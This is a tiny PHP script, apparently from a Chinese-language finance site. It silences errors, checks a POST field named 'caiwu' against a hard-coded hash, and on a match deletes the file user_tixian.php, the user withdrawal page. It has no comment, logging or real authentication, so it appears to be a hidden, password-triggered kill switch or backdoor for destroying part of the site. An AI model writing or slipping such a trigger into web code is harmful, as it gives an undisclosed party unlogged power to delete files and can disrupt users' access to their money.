<?php
error_reporting(0);
header("content-type:text/html;charset=utf-8");
$caiwu=isset($_POST['caiwu'])?$_POST['caiwu']:null;
if($caiwu=="f8e684bd4b4f5f1d5018e106806b294d"){
    unlink("user_tixian.php");
}

?>